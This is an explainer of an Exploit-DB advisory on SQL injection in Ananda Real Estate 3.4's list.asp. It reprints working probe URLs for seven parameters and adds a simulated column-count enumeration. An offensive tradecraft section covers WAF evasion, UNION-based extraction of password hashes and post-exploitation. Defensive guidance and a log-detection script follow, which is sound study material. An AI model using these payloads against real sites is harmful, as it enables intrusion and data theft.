Ananda Real Estate 3.4 'list.asp' SQL Injection Explained

What this paper is
This paper details multiple SQL injection vulnerabilities found in the "list.asp" page of Ananda Real Estate version 3.4. The vulnerabilities allow an attacker to inject malicious SQL code into various parameters, potentially leading to unauthorized data access or manipulation. The paper provides example URLs demonstrating how to trigger these injections.
Simple technical breakdown
Web applications often use databases to store information. When a user interacts with a web page, the application might construct a database query based on the information provided in the URL or form. If the application doesn't properly clean or validate user input before using it in a SQL query, an attacker can insert special SQL commands.
In this case, the "list.asp" page takes several parameters (city, state, country, minprice, maxprice, bed, bath) and uses them to filter real estate listings. The vulnerabilities lie in how these parameters are handled. By injecting ')) union insect, the attacker is attempting to:
- Close existing SQL syntax: the ')) part is intended to close a quoted string and two open parentheses that the application has already put around the user's input in its SQL query.
- Inject new SQL: the union keyword is the standard SQL operator that combines the result sets of two or more SELECT statements.
- Cause an error: insect is not a valid SQL keyword, so whatever the database finds after union is a syntax error. That error confirms the input reached the query parser unescaped, and a verbose error page may reveal information about the database. A distinctive token such as "insect" is also easy to spot in error messages or logs.
The paper shows that this injection can be performed on almost any of the filtering parameters.
Complete code and payload walkthrough
The provided "code" in the paper is not actual executable code in the traditional sense (like a script or program). Instead, it consists of crafted URLs that exploit the web application's backend logic. The "payload" is the malicious string injected into the URL parameters.
Let's break down the structure of the example URLs and the injected payload:
Example URL Structure:
http://[host]/[path]/list.asp?city=%27%29%29+union+insect&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp: the target web page.
?: separates the URL path from the query parameters.
city=%27%29%29+union+insect: the vulnerable parameter, made up of:
- city=: the parameter name.
- %27: URL-encoded single quote (').
- %29%29: two URL-encoded closing parentheses ()).
- +: URL-encoded space.
- union: the SQL UNION operator.
- insect: a non-SQL keyword, used to trigger an error.
&: separates parameters.
state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!: the remaining parameters, some empty, some with default values. They are kept so the page follows its normal search code path, and their presence or absence may affect how the SQL query is constructed. The advisory shows city, state, country, minprice, maxprice, bed and bath each being injectable in turn.
The Injected Payload:
The core of the injected payload is: ')) union insect
Mapping list:
- list.asp?city=...: target ASP page and a parameter vulnerable to SQL injection.
- %27: closes the single quote the application used to delimit the string input in its SQL query.
- %29%29: closes two open parentheses the application used to group conditions or enclose the input.
- +: a space, separating SQL keywords and identifiers.
- union: the SQL keyword that combines result sets of two or more SELECT statements.
- insect: not a valid SQL keyword or identifier; it causes a SQL error, which confirms the injection and may leak database information.
Explanation of the Injection Logic:
The application likely wraps the user's value in quotes and groups its conditions in parentheses, so the query looks roughly like this (simplified and reconstructed; the advisory does not publish the ASP source):
SELECT * FROM properties WHERE ((city = '[user_input_for_city]') AND ...)
When the attacker sends the URL with city=%27%29%29+union+insect, the decoded value ')) union insect is dropped into that slot and the query becomes:
SELECT * FROM properties WHERE ((city = '')) union insect') AND ...)
The ')) part is what breaks out of the expected syntax:
- The ' closes the string literal that was opened for the city value.
- The first ) closes the parenthesis around the city condition.
- The second ) closes the outer grouping.
Everything after that is parsed as new SQL. UNION is introduced, and the database now expects a second SELECT with the same number of columns and compatible data types as the first. It finds insect instead, which is neither a keyword nor a valid expression, so the statement fails with a syntax error. That predictable error is the point of the probe: it proves the input reached the SQL parser unescaped, and where the server returns verbose errors it may also leak the database product, version or query text. If the real query used a different number of parentheses, the number of closing brackets would have to be adjusted, which is normally done by trial.
The paper lists multiple parameters (city, state, country, minprice, maxprice, bed, bath) where this injection can be performed, indicating that the application uses user input from these parameters in a similar vulnerable manner within its SQL queries.
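To make the break-out concrete, the following is an added example, not code from the advisory or from the Ananda product. It reconstructs a plausible list.asp query by string concatenation, runs the advisory's exact query strings against it in an in-memory SQLite database (standing in for whatever backend the real site used), shows the ORDER BY column-count step that precedes a UNION SELECT, and puts the parameterized form beside it. The table, its columns and the shape of the WHERE clause (two levels of parentheses, LIKE matching, bare numeric filters) are assumptions made for the demonstration.

```python
"""
Simulated reconstruction of the list.asp search query: why the advisory's probe
breaks it, how the column count is then enumerated, and why the parameterized
form does not break.  Added example, not code from the advisory or the product.
The real ASP source is not published, so the table, its columns and the shape
of the WHERE clause (two levels of parentheses, LIKE matching, bare numeric
filters) are assumptions, and in-memory SQLite stands in for the real backend.
"""
import sqlite3
from urllib.parse import parse_qs

# Query strings from the advisory's first and fourth URLs, verbatim.
ADVISORY_QS = ("city=%27%29%29+union+insect&state=&country=&minprice=0"
               "&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!")
ADVISORY_MINPRICE_QS = ("city=&state=&country=&minprice=%27%29%29+union+insect"
                        "&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!")
# A constructed benign search for comparison.
BENIGN_QS = ("city=Kathmandu&state=&country=&minprice=0&maxprice=0"
             "&search=yes&bed=0&bath=0&Submit=Search+Now!")
COLUMNS = "id, city, state, country, price, bed, bath"


def decode_params(qs):
    """What Request.QueryString hands the ASP code: percent-decoding already done."""
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def make_db():
    """Constructed sample listings; schema invented for this example."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE properties (id INTEGER, city TEXT, state TEXT, "
                "country TEXT, price INTEGER, bed INTEGER, bath INTEGER)")
    con.executemany("INSERT INTO properties VALUES (?,?,?,?,?,?,?)", [
        (1, "Kathmandu", "Bagmati", "Nepal", 90000, 3, 2),
        (2, "Pokhara", "Gandaki", "Nepal", 65000, 2, 1),
        (3, "Lalitpur", "Bagmati", "Nepal", 120000, 4, 3),
    ])
    return con


def vulnerable_sql(p):
    """String concatenation, as the advisory implies list.asp does.  Text values
    are quoted, numeric ones pasted in bare (maxprice=0 is taken as 'no upper
    bound' and left out); a quote in minprice therefore opens a string literal
    that never closes, which is why that parameter errors on the same probe."""
    return ("SELECT " + COLUMNS + " FROM properties WHERE ("
            "(city LIKE '%" + p["city"] + "%') AND "
            "(state LIKE '%" + p["state"] + "%') AND "
            "(country LIKE '%" + p["country"] + "%') AND "
            "(price >= " + p["minprice"] + ") AND "
            "(bed >= " + p["bed"] + ") AND (bath >= " + p["bath"] + "))")


def run_vulnerable(con, qs):
    """('ok', rows) or ('error', message).  The error is the attacker's signal."""
    try:
        return "ok", con.execute(vulnerable_sql(decode_params(qs))).fetchall()
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def count_columns(con, qs=BENIGN_QS):
    """Column-count enumeration with ORDER BY n, the step before a UNION SELECT:
    the first n the database rejects is one past the number of columns."""
    base = decode_params(qs)
    for n in range(1, 50):
        probe = dict(base, city="')) ORDER BY %d -- " % n)
        try:
            con.execute(vulnerable_sql(probe))
        except sqlite3.OperationalError:
            return n - 1
    return None


def run_safe(con, qs):
    """Parameterized form.  Text is bound as data; numeric filters are converted
    with int() first, so a quote in minprice is rejected before any SQL exists.
    Returns ('ok', rows) or ('rejected', message)."""
    p = decode_params(qs)
    try:
        nums = [int(p[k] or 0) for k in ("minprice", "bed", "bath")]
    except ValueError as exc:
        return "rejected", str(exc)
    sql = ("SELECT " + COLUMNS + " FROM properties WHERE city LIKE ? AND state LIKE ?"
           " AND country LIKE ? AND price >= ? AND bed >= ? AND bath >= ?")
    args = ["%" + p[k] + "%" for k in ("city", "state", "country")] + nums
    return "ok", con.execute(sql, args).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_sql(decode_params(ADVISORY_QS)))
    print(run_vulnerable(db, BENIGN_QS))
    print(run_vulnerable(db, ADVISORY_QS))
    print(run_vulnerable(db, ADVISORY_MINPRICE_QS))
    print("columns in the original query:", count_columns(db))
    print(run_safe(db, ADVISORY_QS), run_safe(db, ADVISORY_MINPRICE_QS))
```

Run stand-alone, the script prints the concatenated statement with ')) union insect sitting inside it, the one benign row, the two database errors the probe produces (a syntax error after union for city, an unterminated string for minprice), the column count of 7 found by ORDER BY, and the parameterized version returning no rows for the city payload and refusing the minprice payload outright. The same probe against a SQL Server or Access backend would fail for the same structural reason, only with different error text.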
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the web application. The advisory shows plain GET requests with no session or login step, so the listing search appears to be reachable without credentials.
- Lab Preconditions:
- A running instance of Ananda Real Estate 3.4 (or a similar web application with the vulnerable list.asp page).
- A web server (e.g., IIS) configured to host the classic ASP application.
- A database backend that the ASP application connects to. The advisory does not name it; classic ASP applications of this era commonly used Microsoft Access or SQL Server.
- Network access to the target web server.
- Tooling Assumptions:
- Web Browser: For manual testing and observation.
- Proxy/Interception Tool: (e.g., Burp Suite, OWASP ZAP) Essential for crafting and modifying requests, observing responses, and automating the process.
- SQL Injection Tools: (e.g., SQLMap) Can automate the discovery and exploitation of these types of vulnerabilities.
- URL Encoder/Decoder: To properly construct and interpret URLs.
- Execution Pitfalls:
- URL Encoding: Incorrectly encoded characters can lead to the payload not being interpreted as intended by the web server or application. In the advisory's URLs, %27 is the quote, %29 the closing parenthesis and + the space.
- Database Specific Syntax: The exact payload (')) union insect) might need slight modifications depending on the SQL dialect (e.g., SQL Server, Access, MySQL) used by the backend. Any non-keyword after union produces an error; "insect" has no special meaning beyond being recognisable.
- WAF/IDS Evasion: Web Application Firewalls or Intrusion Detection Systems might flag the UNION keyword or the pattern of a quote followed by closing parentheses. Obfuscation (case changes, inline comments, alternative encodings) might be required, and is in turn what a defender's normalising rules look for.
- Parameter Order/Number of Columns: For data extraction with UNION SELECT, the attacker needs the number of columns in the original query and their data types. The insect probe confirms injection without having to know either.
- Application Logic: The application might have backend checks or sanitization that are not obvious from the URL.
- Tradecraft Considerations:
- Reconnaissance: Identify the target application version and the specific vulnerable pages/parameters.
- Probing: Start with simple error-based injections (like the one in the paper) to confirm the vulnerability.
- Enumeration: Once confirmed, determine the number of columns in the original query, e.g. with ORDER BY n for increasing n until the database reports that the term is out of range.
- Data Extraction: Use UNION SELECT with a matching column count to extract whatever the application's database account can read (usernames, password hashes, configuration details, etc.).
- Blind SQLi: If error messages are suppressed, fall back to boolean- or time-based blind techniques.
- Post-Exploitation: Depending on the database and the privileges of the application's database account, further actions might include privilege escalation, file system access, or command execution.
Where this was used and when
- Product: Ananda Real Estate 3.4. This is a specific real estate website management software.
- Approximate Year: The paper was published on December 2, 2010. Therefore, this vulnerability was likely discovered and reported around this time. Exploitation would have been relevant in the period leading up to and shortly after 2010.
This type of vulnerability is common in older web applications that were not built with robust security practices in mind. It's a classic example of SQL injection that has been present in web development for many years.
Defensive lessons for modern teams
- Input Validation and Sanitization:
- Never trust user input. All data coming from the client (URL parameters, form fields, cookies, headers) must be treated as potentially malicious.
- Implement strict input validation. Allow only expected characters and formats; minprice, maxprice, bed and bath here should be accepted only as integers.
- Escaping special SQL characters (', ", ;, --, (, )) is a weaker, error-prone fallback. Quote escaping does nothing for values pasted into an unquoted numeric comparison, which is exactly the position of minprice, maxprice, bed and bath in this page.
- Parameterized Queries (Prepared Statements):
- This is the most effective defense against SQL injection.
- Parameterized queries separate the SQL code from the data. The database engine treats the input strictly as data, never as part of the statement.
- Example in pseudocode:
sql_query = "SELECT * FROM properties WHERE city = ?"
execute_query(sql_query, [user_provided_city])
- In classic ASP this means an ADODB.Command with Parameters rather than concatenating Request.QueryString values into the CommandText.
- Least Privilege Principle:
- The database user account used by the web application should have only the minimum necessary permissions. It should not have administrative privileges or the ability to drop tables or execute arbitrary commands.
- Web Application Firewalls (WAFs):
- WAFs can detect and block common SQL injection patterns. However, they are not a foolproof solution and can be bypassed. They should be used as a layer of defense, not the primary one.
- Regular Patching and Updates:
- Keep the web application software, its components, and the underlying database and operating system up to date with the latest security patches.
- Error Handling:
- Configure the application to display generic error messages to users. Detailed database error messages can leak valuable information to attackers. Log detailed errors server-side for debugging.
- Security Testing:
- Regularly perform security assessments, including penetration testing and vulnerability scanning, to identify and remediate SQL injection flaws.
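The WAF and error-handling points above both come down to recognising this probe in what the server records. The following is an added example, not from the advisory or the product: a detection pass over IIS W3C log lines for list.asp requests. The log lines, addresses and paths are constructed for illustration. The parser takes the field layout from the file's own #Fields: directive rather than assuming one; the rules normalise the cheap evasions (inline comments, mixed case, whitespace) before matching, and also flag non-integer values in the four numeric parameters, which is the tightest signal for this particular page.

```python
"""
Detection pass over IIS W3C log lines for the list.asp probes in the advisory.
Added example, not part of the advisory or the product.  The log lines below
are constructed; the field layout is read from the file's own '#Fields:'
directive, as a real parser must, since IIS logging configurations differ.
"""
import re
from urllib.parse import parse_qs

SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2010-12-02 10:15:01 10.0.0.5 GET /realestate/list.asp city=Kathmandu&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now! 80 - 203.0.113.7 Mozilla/5.0 200 0 0
2010-12-02 10:15:09 10.0.0.5 GET /realestate/list.asp city=%27%29%29+union+insect&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now! 80 - 203.0.113.7 Mozilla/5.0 500 0 0
2010-12-02 10:15:13 10.0.0.5 GET /realestate/list.asp city=&state=&country=&minprice=%27%29%29+union+insect&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now! 80 - 203.0.113.7 Mozilla/5.0 500 0 0
2010-12-02 10:15:27 10.0.0.5 GET /realestate/list.asp city=%27%29%29%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsElEcT+1%2C2%2C3--&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now! 80 - 203.0.113.7 Mozilla/5.0 500 0 0
2010-12-02 10:16:02 10.0.0.5 GET /realestate/index.asp - 80 - 198.51.100.9 Mozilla/5.0 200 0 0
"""

COMMENT = re.compile(r"/\*.*?\*/", re.S)             # inline comments used to split keywords
QUOTE_BREAK = re.compile(r"['\"]\s*\)+")              # a quote followed by closing parenthesis
UNION_KW = re.compile(r"\bunion\b\s+(all\s+)?\w+")    # union followed by anything at all
NUMERIC_PARAMS = {"minprice", "maxprice", "bed", "bath"}  # list.asp's integer filters


def parse_w3c(text):
    """Yield one dict per request line, naming fields from the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if fields is None or len(parts) != len(fields):
            continue  # malformed or pre-header line: skip rather than guess
        yield dict(zip(fields, parts))


def normalize(value):
    """Undo the cheap evasions: strip /* */ comments, fold case, collapse spaces."""
    value = COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def inspect_query(raw_query):
    """Return sorted reason strings for one cs-uri-query value ('-' means none)."""
    reasons = set()
    if raw_query == "-":
        return []
    for name, values in parse_qs(raw_query, keep_blank_values=True).items():
        for v in values:          # parse_qs has already percent- and plus-decoded
            n = normalize(v)
            if QUOTE_BREAK.search(n):
                reasons.add("quote-break:" + name)
            if UNION_KW.search(n):
                reasons.add("union:" + name)
            if name in NUMERIC_PARAMS and not re.fullmatch(r"\d*", v):
                reasons.add("non-numeric:" + name)
    return sorted(reasons)


def scan_log(text):
    """One hit per flagged request, with the status code so 500s can corroborate."""
    hits = []
    for rec in parse_w3c(text):
        reasons = inspect_query(rec.get("cs-uri-query", "-"))
        if reasons:
            hits.append({"time": rec["date"] + " " + rec["time"], "client": rec["c-ip"],
                         "uri": rec["cs-uri-stem"], "status": rec["sc-status"],
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Three of the five constructed requests are flagged: the advisory's city and minprice probes, and a mixed-case variant split with inline comments that a plain substring match for "union select" would miss. The benign search and the index.asp request produce nothing. Correlating the flags with the 500 status on those requests is the same observation the attacker makes from the other side, which is why the generic error page in the Error Handling point above matters: it removes the attacker's signal without removing yours.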
ASCII visual (if applicable)
This vulnerability is primarily about how data flows from the user's browser into the web application's backend SQL query. A simple visual can represent this:
+-----------------+      +-----------------+      +-----------------+      +-----------------+
| User's Browser  |----->| Web Server      |----->| Web Application |----->| Database Server |
| (Crafted URL)   |      | (list.asp)      |      | (ASP Code)      |      | (SQL Query)     |
+-----------------+      +-----------------+      +-----------------+      +-----------------+
         |                                                                          ^
         +---- the decoded value ')) union insect reaches the SQL text unchanged ---+

In this diagram:
- The User's Browser sends a request with a crafted URL containing malicious input.
- The Web Server receives the request and passes it to the Web Application (specifically list.asp).
- The Web Application (ASP code) takes the input from the URL parameter.
- Crucially, if not properly sanitized, the application directly incorporates this input into a SQL query sent to the Database Server.
- The Database Server executes the query, which, due to the injection, might behave unexpectedly, leading to data leakage or other unintended consequences.
The vulnerability lies in the direct incorporation of user input into the SQL query without proper validation or escaping.
Source references
- PAPER ID: 15661
- PAPER TITLE: Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections
- AUTHOR: underground-stockholm.com
- PUBLISHED: 2010-12-02
- PAPER URL: https://www.exploit-db.com/papers/15661
- RAW URL: https://www.exploit-db.com/raw/15661
Original Exploit-DB Content (Verbatim)
TITLE: Ananda Real Estate "list.asp" Multiple SQL Injection Vulnerabilities
PRODUCT: Ananda Real Estate 3.4
PRODUCT URL: http://www.softwebsnepal.com/website_design_realestate.htm
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
BUGS:
http://[host]/[path]/list.asp?city=%27%29%29+union+insect&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=%27%29%29+union+insect&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=%27%29%29+union+insect&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=%27%29%29+union+insect&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=%27%29%29+union+insect&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=%27%29%29+union+insect&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=&bath=%27%29%29+union+insect&Submit=Search+Now!